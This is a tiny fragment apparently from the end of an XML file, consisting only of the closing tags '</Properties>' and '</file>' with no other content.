</Properties>
</file>